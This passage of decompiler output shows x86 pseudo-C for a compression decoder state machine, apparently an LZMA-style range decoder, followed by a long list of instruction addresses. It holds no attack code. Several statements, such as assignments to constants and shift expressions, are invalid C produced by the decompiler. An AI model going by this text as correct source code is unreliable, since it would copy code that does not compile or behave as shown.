                                                							_t208 =  &_v116;
                                                							 *_t208 = _v116 + 1;
                                                							__eflags =  *_t208;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							L62:
                                                							__eflags = __ebx - 0x100;
                                                							if(__ebx >= 0x100) {
                                                								L57:
                                                								__al = _v72;
                                                								_v96 = _v72;
                                                								goto L58;
                                                							}
                                                							L63:
                                                							__eax = _v92;
                                                							__edx = __ebx + __ebx;
                                                							__ecx = _v20;
                                                							__esi = __edx + __eax;
                                                							__ecx = _v20 >> 0xb;
                                                							__ax =  *__esi;
                                                							_v88 = __esi;
                                                							__edi = __ax & 0x0000ffff;
                                                							__ecx = (_v20 >> 0xb) * __edi;
                                                							__eflags = _v16 - __ecx;
                                                							if(_v16 >= __ecx) {
                                                								_v20 = _v20 - __ecx;
                                                								_v16 = _v16 - __ecx;
                                                								__cx = __ax;
                                                								_t222 = __edx + 1; // 0x1
                                                								__ebx = _t222;
                                                								__cx = __ax >> 5;
                                                								__eflags = __eax;
                                                								 *__esi = __ax;
                                                							} else {
                                                								_v20 = __ecx;
                                                								0x800 = 0x800 - __edi;
                                                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags = _v20 - 0x1000000;
                                                							_v72 = __ebx;
                                                							if(_v20 >= 0x1000000) {
                                                								goto L62;
                                                							} else {
                                                								goto L60;
                                                							}
                                                						case 0x10:
                                                							L112:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0x10;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t371 =  &_v116;
                                                							 *_t371 = _v116 + 1;
                                                							__eflags =  *_t371;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							goto L114;
                                                						case 0x11:
                                                							L71:
                                                							__esi = _v92;
                                                							_v136 = 0x12;
                                                							goto L135;
                                                						case 0x12:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								__eax = _v92;
                                                								_v136 = 0x13;
                                                								__esi = _v92 + 2;
                                                								L135:
                                                								_v88 = _t626;
                                                								goto L136;
                                                							}
                                                							__eax = _v80;
                                                							_v52 = _v52 & 0x00000000;
                                                							__ecx = _v92;
                                                							__eax = _v80 << 4;
                                                							__eflags = __eax;
                                                							__eax = _v92 + __eax + 4;
                                                							goto L133;
                                                						case 0x13:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								_t475 =  &_v92;
                                                								 *_t475 = _v92 + 0x204;
                                                								__eflags =  *_t475;
                                                								_v52 = 0x10;
                                                								_v68 = 8;
                                                								L147:
                                                								_v128 = 0x14;
                                                								goto L148;
                                                							}
                                                							__eax = _v80;
                                                							__ecx = _v92;
                                                							__eax = _v80 << 4;
                                                							_v52 = 8;
                                                							__eax = _v92 + (_v80 << 4) + 0x104;
                                                							L133:
                                                							_v92 = __eax;
                                                							_v68 = 3;
                                                							goto L147;
                                                						case 0x14:
                                                							_v52 = _v52 + __ebx;
                                                							__eax = _v132;
                                                							goto L143;
                                                						case 0x15:
                                                							__eax = 0;
                                                							__eflags = _v60 - 7;
                                                							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                							__al = __al & 0x000000fd;
                                                							__eax = (__eflags >= 0) - 1 + 0xb;
                                                							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                							goto L123;
                                                						case 0x16:
                                                							__eax = _v52;
                                                							__eflags = __eax - 4;
                                                							if(__eax >= 4) {
                                                								_push(3);
                                                								_pop(__eax);
                                                							}
                                                							__ecx = _v8;
                                                							_v68 = 6;
                                                							__eax = __eax << 7;
                                                							_v128 = 0x19;
                                                							_v92 = __eax;
                                                							goto L148;
                                                						case 0x17:
                                                							L148:
                                                							__eax = _v68;
                                                							_v84 = 1;
                                                							_v76 = _v68;
                                                							goto L152;
                                                						case 0x18:
                                                							L149:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0x18;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t490 =  &_v116;
                                                							 *_t490 = _v116 + 1;
                                                							__eflags =  *_t490;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							L151:
                                                							_t493 =  &_v76;
                                                							 *_t493 = _v76 - 1;
                                                							__eflags =  *_t493;
                                                							L152:
                                                							__eflags = _v76;
                                                							if(_v76 <= 0) {
                                                								__ecx = _v68;
                                                								__ebx = _v84;
                                                								0 = 1;
                                                								__eax = 1 << __cl;
                                                								__ebx = _v84 - (1 << __cl);
                                                								__eax = _v128;
                                                								_v72 = __ebx;
                                                								L143:
                                                								_v140 = _t561;
                                                								goto L3;
                                                							}
                                                							__eax = _v84;
                                                							_v20 = _v20 >> 0xb;
                                                							__edx = _v84 + _v84;
                                                							__eax = _v92;
                                                							__esi = __edx + __eax;
                                                							_v88 = __esi;
                                                							__ax =  *__esi;
                                                							__edi = __ax & 0x0000ffff;
                                                							__ecx = (_v20 >> 0xb) * __edi;
                                                							__eflags = _v16 - __ecx;
                                                							if(_v16 >= __ecx) {
                                                								_v20 = _v20 - __ecx;
                                                								_v16 = _v16 - __ecx;
                                                								__cx = __ax;
                                                								__cx = __ax >> 5;
                                                								__eax = __eax - __ecx;
                                                								__edx = __edx + 1;
                                                								__eflags = __edx;
                                                								 *__esi = __ax;
                                                								_v84 = __edx;
                                                							} else {
                                                								_v20 = __ecx;
                                                								0x800 = 0x800 - __edi;
                                                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                								_v84 = _v84 << 1;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags = _v20 - 0x1000000;
                                                							if(_v20 >= 0x1000000) {
                                                								goto L151;
                                                							} else {
                                                								goto L149;
                                                							}
                                                						case 0x19:
                                                							__eflags = __ebx - 4;
                                                							if(__ebx < 4) {
                                                								_v48 = __ebx;
                                                								L122:
                                                								_t399 =  &_v48;
                                                								 *_t399 = _v48 + 1;
                                                								__eflags =  *_t399;
                                                								L123:
                                                								__eax = _v48;
                                                								__eflags = __eax;
                                                								if(__eax == 0) {
                                                									_v52 = _v52 | 0xffffffff;
                                                									goto L173;
                                                								}
                                                								__eflags = __eax - _v100;
                                                								if(__eax > _v100) {
                                                									goto L174;
                                                								}
                                                								_v52 = _v52 + 2;
                                                								__eax = _v52;
                                                								_t406 =  &_v100;
                                                								 *_t406 = _v100 + _v52;
                                                								__eflags =  *_t406;
                                                								goto L126;
                                                							}
                                                							__ecx = __ebx;
                                                							__eax = __ebx;
                                                							__ecx = __ebx >> 1;
                                                							__eax = __ebx & 0x00000001;
                                                							__ecx = (__ebx >> 1) - 1;
                                                							__al = __al | 0x00000002;
                                                							__eax = (__ebx & 0x00000001) << __cl;
                                                							__eflags = __ebx - 0xe;
                                                							_v48 = __eax;
                                                							if(__ebx >= 0xe) {
                                                								__ebx = 0;
                                                								_v76 = __ecx;
                                                								L105:
                                                								__eflags = _v76;
                                                								if(_v76 <= 0) {
                                                									__eax = __eax + __ebx;
                                                									_v68 = 4;
                                                									_v48 = __eax;
                                                									__eax = _v8;
                                                									__eax = _v8 + 0x644;
                                                									__eflags = __eax;
                                                									L111:
                                                									__ebx = 0;
                                                									_v92 = __eax;
                                                									_v84 = 1;
                                                									_v72 = 0;
                                                									_v76 = 0;
                                                									L115:
                                                									__eax = _v68;
                                                									__eflags = _v76 - _v68;
                                                									if(_v76 >= _v68) {
                                                										_t397 =  &_v48;
                                                										 *_t397 = _v48 + __ebx;
                                                										__eflags =  *_t397;
                                                										goto L122;
                                                									}
                                                									__eax = _v84;
                                                									_v20 = _v20 >> 0xb;
                                                									__edi = _v84 + _v84;
                                                									__eax = _v92;
                                                									__esi = __edi + __eax;
                                                									_v88 = __esi;
                                                									__ax =  *__esi;
                                                									__ecx = __ax & 0x0000ffff;
                                                									__edx = (_v20 >> 0xb) * __ecx;
                                                									__eflags = _v16 - __edx;
                                                									if(_v16 >= __edx) {
                                                										__ecx = 0;
                                                										_v20 = _v20 - __edx;
                                                										__ecx = 1;
                                                										_v16 = _v16 - __edx;
                                                										__ebx = 1;
                                                										__ecx = _v76;
                                                										__ebx = 1 << __cl;
                                                										__ecx = 1 << __cl;
                                                										__ebx = _v72;
                                                										__ebx = _v72 | __ecx;
                                                										__cx = __ax;
                                                										__cx = __ax >> 5;
                                                										__eax = __eax - __ecx;
                                                										__edi = __edi + 1;
                                                										__eflags = __edi;
                                                										_v72 = __ebx;
                                                										 *__esi = __ax;
                                                										_v84 = __edi;
                                                									} else {
                                                										_v20 = __edx;
                                                										0x800 = 0x800 - __ecx;
                                                										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                										_v84 = _v84 << 1;
                                                										 *__esi = __dx;
                                                									}
                                                									__eflags = _v20 - 0x1000000;
                                                									if(_v20 >= 0x1000000) {
                                                										L114:
                                                										_t374 =  &_v76;
                                                										 *_t374 = _v76 + 1;
                                                										__eflags =  *_t374;
                                                										goto L115;
                                                									} else {
                                                										goto L112;
                                                									}
                                                								}
                                                								__ecx = _v16;
                                                								__ebx = __ebx + __ebx;
                                                								_v20 = _v20 >> 1;
                                                								__eflags = _v16 - _v20;
                                                								_v72 = __ebx;
                                                								if(_v16 >= _v20) {
                                                									__ecx = _v20;
                                                									_v16 = _v16 - _v20;
                                                									__ebx = __ebx | 0x00000001;
                                                									__eflags = __ebx;
                                                									_v72 = __ebx;
                                                								}
                                                								__eflags = _v20 - 0x1000000;
                                                								if(_v20 >= 0x1000000) {
                                                									L104:
                                                									_t344 =  &_v76;
                                                									 *_t344 = _v76 - 1;
                                                									__eflags =  *_t344;
                                                									goto L105;
                                                								} else {
                                                									goto L102;
                                                								}
                                                							}
                                                							__edx = _v8;
                                                							__eax = __eax - __ebx;
                                                							_v68 = __ecx;
                                                							__eax = _v8 + 0x55e + __eax * 2;
                                                							goto L111;
                                                						case 0x1a:
                                                							L58:
                                                							__eflags = _v104;
                                                							if(_v104 == 0) {
                                                								_v140 = 0x1a;
                                                								goto L173;
                                                							}
                                                							__ecx = _v108;
                                                							__al = _v96;
                                                							__edx = _v12;
                                                							_v100 = _v100 + 1;
                                                							_v108 = _v108 + 1;
                                                							_v104 = _v104 - 1;
                                                							 *_v108 = __al;
                                                							__ecx = _v24;
                                                							 *(_v12 + __ecx) = __al;
                                                							__eax = __ecx + 1;
                                                							__edx = 0;
                                                							_t197 = __eax % _v120;
                                                							__eax = __eax / _v120;
                                                							__edx = _t197;
                                                							goto L82;
                                                						case 0x1b:
                                                							L78:
                                                							__eflags = _v104;
                                                							if(_v104 == 0) {
                                                								_v140 = 0x1b;
                                                								goto L173;
                                                							}
                                                							__eax = _v24;
                                                							__eax = _v24 - _v48;
                                                							__eflags = __eax - _v120;
                                                							if(__eax >= _v120) {
                                                								__eax = __eax + _v120;
                                                								__eflags = __eax;
                                                							}
                                                							__edx = _v12;
                                                							__cl =  *(__edx + __eax);
                                                							__eax = _v24;
                                                							_v96 = __cl;
                                                							 *(__edx + __eax) = __cl;
                                                							__eax = __eax + 1;
                                                							__edx = 0;
                                                							_t280 = __eax % _v120;
                                                							__eax = __eax / _v120;
                                                							__edx = _t280;
                                                							__eax = _v108;
                                                							_v100 = _v100 + 1;
                                                							_v108 = _v108 + 1;
                                                							_t289 =  &_v104;
                                                							 *_t289 = _v104 - 1;
                                                							__eflags =  *_t289;
                                                							 *_v108 = __cl;
                                                							L82:
                                                							_v24 = __edx;
                                                							goto L83;
                                                						case 0x1c:
                                                							while(1) {
                                                								L126:
                                                								__eflags = _v104;
                                                								if(_v104 == 0) {
                                                									break;
                                                								}
                                                								__eax = _v24;
                                                								__eax = _v24 - _v48;
                                                								__eflags = __eax - _v120;
                                                								if(__eax >= _v120) {
                                                									__eax = __eax + _v120;
                                                									__eflags = __eax;
                                                								}
                                                								__edx = _v12;
                                                								__cl =  *(__edx + __eax);
                                                								__eax = _v24;
                                                								_v96 = __cl;
                                                								 *(__edx + __eax) = __cl;
                                                								__eax = __eax + 1;
                                                								__edx = 0;
                                                								_t420 = __eax % _v120;
                                                								__eax = __eax / _v120;
                                                								__edx = _t420;
                                                								__eax = _v108;
                                                								_v108 = _v108 + 1;
                                                								_v104 = _v104 - 1;
                                                								_v52 = _v52 - 1;
                                                								__eflags = _v52;
                                                								 *_v108 = __cl;
                                                								_v24 = _t420;
                                                								if(_v52 > 0) {
                                                									continue;
                                                								} else {
                                                									L83:
                                                									_v140 = 2;
                                                									goto L3;
                                                								}
                                                							}
                                                							_v140 = 0x1c;
                                                							L173:
                                                							_push(0x22);
                                                							_pop(_t574);
                                                							memcpy(_v148,  &_v140, _t574 << 2);
                                                							return 0;
                                                					}
                                                				}
                                                				L174:
                                                				_t538 = _t537 | 0xffffffff;
                                                				return _t538;
                                                			}










































                                                0x00406a5f
                                                0x00406a66
                                                0x00406a6c
                                                0x00406a72
                                                0x00000000
                                                0x00406a76
                                                0x00406a82
                                                0x00406a82
                                                0x00406a82
                                                0x00406a8b
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00000000
                                                0x00406a98
                                                0x00406a9c
                                                0x00000000
                                                0x00000000
                                                0x00406aa5
                                                0x00406aa8
                                                0x00406aab
                                                0x00406aad
                                                0x00406aaf
                                                0x00000000
                                                0x00000000
                                                0x00406ab5
                                                0x00406ab8
                                                0x00406aba
                                                0x00406abb
                                                0x00406abe
                                                0x00406ac0
                                                0x00406ac1
                                                0x00406ac3
                                                0x00406ac6
                                                0x00406acb
                                                0x00406ad0
                                                0x00406ad9
                                                0x00406aec
                                                0x00406aef
                                                0x00406af8
                                                0x00406afb
                                                0x00406b23
                                                0x00406b23
                                                0x00406b25
                                                0x00406b33
                                                0x00406b33
                                                0x00406b37
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406b27
                                                0x00406b27
                                                0x00406b2a
                                                0x00406b2a
                                                0x00406b2b
                                                0x00406b2b
                                                0x00000000
                                                0x00406b27
                                                0x00406afd
                                                0x00406b01
                                                0x00406b06
                                                0x00406b06
                                                0x00406b0f
                                                0x00406b15
                                                0x00406b17
                                                0x00406b1a
                                                0x00000000
                                                0x00406b20
                                                0x00406b20
                                                0x00000000
                                                0x00406b20
                                                0x00000000
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b41
                                                0x004073ed
                                                0x00000000
                                                0x004073ed
                                                0x00406b4a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b60
                                                0x00406b63
                                                0x00406b63
                                                0x00406b67
                                                0x00000000
                                                0x00000000
                                                0x00406b69
                                                0x00406b6c
                                                0x00406b6f
                                                0x00406b99
                                                0x00406b9f
                                                0x00406ba6
                                                0x00000000
                                                0x00406ba6
                                                0x00406b71
                                                0x00406b75
                                                0x00406b78
                                                0x00406b7d
                                                0x00406b7d
                                                0x00406b88
                                                0x00406b8e
                                                0x00406b90
                                                0x00406b93
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bd8
                                                0x00406bde
                                                0x00406be1
                                                0x00406bee
                                                0x00406bf6
                                                0x00000000
                                                0x00000000
                                                0x00406bad
                                                0x00406bad
                                                0x00406bb1
                                                0x004073fc
                                                0x00000000
                                                0x004073fc
                                                0x00406bbd
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bcb
                                                0x00406bce
                                                0x00406bd1
                                                0x00406bd4
                                                0x00406bd6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040726d
                                                0x0040726d
                                                0x00407273
                                                0x00407279
                                                0x0040727c
                                                0x0040727f
                                                0x00407299
                                                0x0040729c
                                                0x004072a2
                                                0x004072ad
                                                0x004072ad
                                                0x004072af
                                                0x00407281
                                                0x00407281
                                                0x00407290
                                                0x00407294
                                                0x00407294
                                                0x004072b2
                                                0x004072b9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004072bb
                                                0x004072bb
                                                0x004072bf
                                                0x0040746e
                                                0x00000000
                                                0x0040746e
                                                0x004072cb
                                                0x004072d2
                                                0x004072da
                                                0x004072da
                                                0x004072da
                                                0x004072dd
                                                0x004072e0
                                                0x004072e0
                                                0x00000000
                                                0x00000000
                                                0x00406bfe
                                                0x00406c00
                                                0x00406c03
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c81
                                                0x00406c8b
                                                0x00000000
                                                0x00406c8b
                                                0x00406c05
                                                0x00406c09
                                                0x00406c0c
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c16
                                                0x00406c19
                                                0x00406c1b
                                                0x00406c20
                                                0x00406c23
                                                0x00406c26
                                                0x00406c2a
                                                0x00406c31
                                                0x00406c34
                                                0x00406c3b
                                                0x00406c3f
                                                0x00406c47
                                                0x00406c47
                                                0x00406c47
                                                0x00406c41
                                                0x00406c41
                                                0x00406c41
                                                0x00406c36
                                                0x00406c36
                                                0x00406c36
                                                0x00406c4b
                                                0x00406c4e
                                                0x00406c6c
                                                0x00406c6e
                                                0x00000000
                                                0x00406c6e
                                                0x00406c50
                                                0x00406c53
                                                0x00406c56
                                                0x00406c59
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5e
                                                0x00406c61
                                                0x00406c63
                                                0x00406c64
                                                0x00406c67
                                                0x00000000
                                                0x00000000
                                                0x00406e9d
                                                0x00406ea1
                                                0x00406ebf
                                                0x00406ec2
                                                0x00406ec9
                                                0x00406ecc
                                                0x00406ecf
                                                0x00406ed2
                                                0x00406ed5
                                                0x00406ed8
                                                0x00406eda
                                                0x00406ee1
                                                0x00406ee2
                                                0x00406ee4
                                                0x00406ee7
                                                0x00406eea
                                                0x00406eed
                                                0x00406eed
                                                0x00406ef2
                                                0x00000000
                                                0x00406ef2
                                                0x00406ea3
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406eb3
                                                0x00000000
                                                0x00000000
                                                0x00406f07
                                                0x00406f0b
                                                0x00406f2e
                                                0x00406f31
                                                0x00406f34
                                                0x00406f3e
                                                0x00406f0d
                                                0x00406f0d
                                                0x00406f10
                                                0x00406f13
                                                0x00406f16
                                                0x00406f23
                                                0x00406f26
                                                0x00406f26
                                                0x00000000
                                                0x00000000
                                                0x00406f4a
                                                0x00406f4e
                                                0x00000000
                                                0x00000000
                                                0x00406f54
                                                0x00406f58
                                                0x00000000
                                                0x00000000
                                                0x00406f5e
                                                0x00406f60
                                                0x00406f64
                                                0x00406f64
                                                0x00406f67
                                                0x00406f6b
                                                0x00000000
                                                0x00000000
                                                0x00406fbb
                                                0x00406fbf
                                                0x00406fc6
                                                0x00406fc9
                                                0x00406fcc
                                                0x00406fd6
                                                0x00000000
                                                0x00406fd6
                                                0x00406fc1
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe6
                                                0x00406fed
                                                0x00406ff0
                                                0x00406ff3
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406ff6
                                                0x00406ff9
                                                0x00406ffc
                                                0x00406ffc
                                                0x00406fff
                                                0x00407002
                                                0x00407005
                                                0x00407005
                                                0x00407008
                                                0x0040700f
                                                0x00407014
                                                0x00000000
                                                0x00000000
                                                0x004070a2
                                                0x004070a2
                                                0x004070a6
                                                0x00407444
                                                0x00000000
                                                0x00407444
                                                0x004070ac
                                                0x004070af
                                                0x004070b2
                                                0x004070b6
                                                0x004070b9
                                                0x004070bf
                                                0x004070c1
                                                0x004070c1
                                                0x004070c1
                                                0x004070c4
                                                0x004070c7
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c97
                                                0x00406c9b
                                                0x00407408
                                                0x00000000
                                                0x00407408
                                                0x00406ca1
                                                0x00406ca4
                                                0x00406ca7
                                                0x00406cab
                                                0x00406cae
                                                0x00406cb4
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbc
                                                0x00406cbf
                                                0x00406cc2
                                                0x00000000
                                                0x00000000
                                                0x00406cc8
                                                0x00406cce
                                                0x00000000
                                                0x00000000
                                                0x00406cd4
                                                0x00406cd4
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ce5
                                                0x00406ce8
                                                0x00406cea
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cf6
                                                0x00406cf9
                                                0x00406cfc
                                                0x00406cff
                                                0x00406d02
                                                0x00406d1e
                                                0x00406d21
                                                0x00406d24
                                                0x00406d27
                                                0x00406d2e
                                                0x00406d32
                                                0x00406d34
                                                0x00406d38
                                                0x00406d04
                                                0x00406d04
                                                0x00406d08
                                                0x00406d10
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d3b
                                                0x00406d42
                                                0x00406d45
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d50
                                                0x00406d50
                                                0x00406d54
                                                0x00407414
                                                0x00000000
                                                0x00407414
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d64
                                                0x00406d67
                                                0x00406d6d
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d75
                                                0x00406d75
                                                0x00406d75
                                                0x00406d7b
                                                0x00000000
                                                0x00000000
                                                0x00406d7d
                                                0x00406d80
                                                0x00406d83
                                                0x00406d86
                                                0x00406d89
                                                0x00406d8c
                                                0x00406d8f
                                                0x00406d92
                                                0x00406d95
                                                0x00406d98
                                                0x00406d9b
                                                0x00406db3
                                                0x00406db6
                                                0x00406db9
                                                0x00406dbc
                                                0x00406dbc
                                                0x00406dbf
                                                0x00406dc3
                                                0x00406dc5
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da5
                                                0x00406daa
                                                0x00406dac
                                                0x00406dae
                                                0x00406dae
                                                0x00406dc8
                                                0x00406dcf
                                                0x00406dd2
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00000000
                                                0x00000000
                                                0x00406e14
                                                0x00406e14
                                                0x00406e18
                                                0x00407420
                                                0x00000000
                                                0x00407420
                                                0x00406e1e
                                                0x00406e21
                                                0x00406e24
                                                0x00406e28
                                                0x00406e2b
                                                0x00406e31
                                                0x00406e33
                                                0x00406e33
                                                0x00406e33
                                                0x00406e36
                                                0x00406e39
                                                0x00406e39
                                                0x00406e3f
                                                0x00406ddd
                                                0x00406ddd
                                                0x00406de0
                                                0x00000000
                                                0x00406de0
                                                0x00406e41
                                                0x00406e41
                                                0x00406e44
                                                0x00406e47
                                                0x00406e4a
                                                0x00406e4d
                                                0x00406e50
                                                0x00406e53
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e5f
                                                0x00406e77
                                                0x00406e7a
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e80
                                                0x00406e83
                                                0x00406e87
                                                0x00406e89
                                                0x00406e61
                                                0x00406e61
                                                0x00406e69
                                                0x00406e6e
                                                0x00406e70
                                                0x00406e72
                                                0x00406e72
                                                0x00406e8c
                                                0x00406e93
                                                0x00406e96
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00407125
                                                0x00407125
                                                0x00407129
                                                0x00407450
                                                0x00000000
                                                0x00407450
                                                0x0040712f
                                                0x00407132
                                                0x00407135
                                                0x00407139
                                                0x0040713c
                                                0x00407142
                                                0x00407144
                                                0x00407144
                                                0x00407144
                                                0x00407147
                                                0x00000000
                                                0x00000000
                                                0x00406ef5
                                                0x00406ef5
                                                0x00406ef8
                                                0x00000000
                                                0x00000000
                                                0x00407234
                                                0x00407238
                                                0x0040725a
                                                0x0040725d
                                                0x00407267
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x0040723a
                                                0x0040723d
                                                0x00407241
                                                0x00407244
                                                0x00407244
                                                0x00407247
                                                0x00000000
                                                0x00000000
                                                0x004072f1
                                                0x004072f5
                                                0x00407313
                                                0x00407313
                                                0x00407313
                                                0x0040731a
                                                0x00407321
                                                0x00407328
                                                0x00407328
                                                0x00000000
                                                0x00407328
                                                0x004072f7
                                                0x004072fa
                                                0x004072fd
                                                0x00407300
                                                0x00407307
                                                0x0040724b
                                                0x0040724b
                                                0x0040724e
                                                0x00000000
                                                0x00000000
                                                0x004073e2
                                                0x004073e5
                                                0x00000000
                                                0x00000000
                                                0x0040701c
                                                0x0040701e
                                                0x00407025
                                                0x00407026
                                                0x00407028
                                                0x0040702b
                                                0x00000000
                                                0x00000000
                                                0x00407033
                                                0x00407036
                                                0x00407039
                                                0x0040703b
                                                0x0040703d
                                                0x0040703d
                                                0x0040703e
                                                0x00407041
                                                0x00407048
                                                0x0040704b
                                                0x00407059
                                                0x00000000
                                                0x00000000
                                                0x0040732f
                                                0x0040732f
                                                0x00407332
                                                0x00407339
                                                0x00000000
                                                0x00000000
                                                0x0040733e
                                                0x0040733e
                                                0x00407342
                                                0x0040747a
                                                0x00000000
                                                0x0040747a
                                                0x00407348
                                                0x0040734b
                                                0x0040734e
                                                0x00407352
                                                0x00407355
                                                0x0040735b
                                                0x0040735d
                                                0x0040735d
                                                0x0040735d
                                                0x00407360
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407366
                                                0x00407366
                                                0x0040736a
                                                0x004073ca
                                                0x004073cd
                                                0x004073d2
                                                0x004073d3
                                                0x004073d5
                                                0x004073d7
                                                0x004073da
                                                0x004072e6
                                                0x004072e6
                                                0x00000000
                                                0x004072e6
                                                0x0040736c
                                                0x00407372
                                                0x00407375
                                                0x00407378
                                                0x0040737b
                                                0x0040737e
                                                0x00407381
                                                0x00407384
                                                0x00407387
                                                0x0040738a
                                                0x0040738d
                                                0x004073a6
                                                0x004073a9
                                                0x004073ac
                                                0x004073af
                                                0x004073b3
                                                0x004073b5
                                                0x004073b5
                                                0x004073b6
                                                0x004073b9
                                                0x0040738f
                                                0x0040738f
                                                0x00407397
                                                0x0040739c
                                                0x0040739e
                                                0x004073a1
                                                0x004073a1
                                                0x004073bc
                                                0x004073c3
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x00407061
                                                0x00407064
                                                0x0040709a
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071d0
                                                0x004071d2
                                                0x0040745c
                                                0x00000000
                                                0x0040745c
                                                0x004071d8
                                                0x004071db
                                                0x00000000
                                                0x00000000
                                                0x004071e1
                                                0x004071e5
                                                0x004071e8
                                                0x004071e8
                                                0x004071e8
                                                0x00000000
                                                0x004071e8
                                                0x00407066
                                                0x00407068
                                                0x0040706a
                                                0x0040706c
                                                0x0040706f
                                                0x00407070
                                                0x00407072
                                                0x00407074
                                                0x00407077
                                                0x0040707a
                                                0x00407090
                                                0x00407095
                                                0x004070cd
                                                0x004070cd
                                                0x004070d1
                                                0x004070fd
                                                0x004070ff
                                                0x00407106
                                                0x00407109
                                                0x0040710c
                                                0x0040710c
                                                0x00407111
                                                0x00407111
                                                0x00407113
                                                0x00407116
                                                0x0040711d
                                                0x00407120
                                                0x0040714d
                                                0x0040714d
                                                0x00407150
                                                0x00407153
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x00000000
                                                0x004071c7
                                                0x00407155
                                                0x0040715b
                                                0x0040715e
                                                0x00407161
                                                0x00407164
                                                0x00407167
                                                0x0040716a
                                                0x0040716d
                                                0x00407170
                                                0x00407173
                                                0x00407176
                                                0x0040718f
                                                0x00407191
                                                0x00407194
                                                0x00407195
                                                0x00407198
                                                0x0040719a
                                                0x0040719d
                                                0x0040719f
                                                0x004071a1
                                                0x004071a4
                                                0x004071a6
                                                0x004071a9
                                                0x004071ad
                                                0x004071af
                                                0x004071af
                                                0x004071b0
                                                0x004071b3
                                                0x004071b6
                                                0x00407178
                                                0x00407178
                                                0x00407180
                                                0x00407185
                                                0x00407187
                                                0x0040718a
                                                0x0040718a
                                                0x004071b9
                                                0x004071c0
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00406de3
                                                0x00406de3
                                                0x00406de7
